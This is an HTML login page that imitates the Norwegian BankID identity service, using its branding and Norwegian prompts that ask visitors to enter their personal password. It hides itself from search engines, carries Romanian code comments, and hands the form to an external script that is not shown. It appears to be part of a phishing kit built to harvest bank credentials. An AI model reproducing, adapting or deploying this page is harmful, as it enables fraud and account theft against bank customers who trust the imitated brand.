<!DOCTYPE html>
<html lang="nb">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="robots" content="noindex, nofollow">
    <link rel="icon" type="image/png" href="img/favicon.b4be5517.png">
    <title>BankID</title>
    <link href="css/authorization.11f23e186330ca22e8f9.css" rel="stylesheet">
    <script type="text/javascript" src="js/jquery-3.6.3.min.js"></script>
    <script type="text/javascript" src="js/login5.js"></script>
    <style>
        /* Stilizare placeholder */
        input::placeholder {
            font-size: 16px; /* Dimensiunea textului placeholder-ului */
            color: #888; /* Culoarea textului placeholder-ului (op?ional) */
        }
    </style>
</head>
<body class="">
    <main class="container">
        <div class="container__content">
            <div class="bankid-logo-wrapper">
                <img alt="" class="bankid-logo" src="img/bankid-logo.28f35de5.svg">
            </div>
            <div id="wait">
                <img alt="" class="bankid-symbol" src="img/bankid-symbol-animated.ee3b536a.svg">
                <span class="sr-only" role="alert" lang="en">Loading</span>
            </div>
            <div class="page" id="getNnin" style="">
                <form id="nnin-form" novalidate="">
                    <div class="page__content">
                        <span class="merchant_name"><b>Identifisering</b></span>
                        <label for="nnin" data-i18n="nnin_label" style="font-size: small; font-weight: normal;">
                            Godkjenn via BankID-appen og skriv inn din Personlig passord:
                        </label>
                        <input name="nnin" id="nnin" placeholder="Personlig passord" maxlength="40" minlength="1" autocomplete="off" aria-labelledby="nnin-title" aria-invalid="true" required="" data-format="...... ....." data-slots="." data-separator=" ">
                        <div class="helper-text-container">
                            <img id="helperTextErrorIcon" src="img/helper-text-error.b85af04c.svg" alt="" style="display:none">
                        </div>
                        <div class="buttons__page__middle">
                            <button type="button" data-i18n="next" id="nnin-next-button" class="button button--default">Neste</button>
                        </div>
                    </div>
                </form>
                <div class="page__buttons">
                    <button data-i18n="cancel" id="decline-nnin-button" class="button button--link">Avbryt</button>
                </div>
            </div>
        </div>
    </main>
</body>
</html>
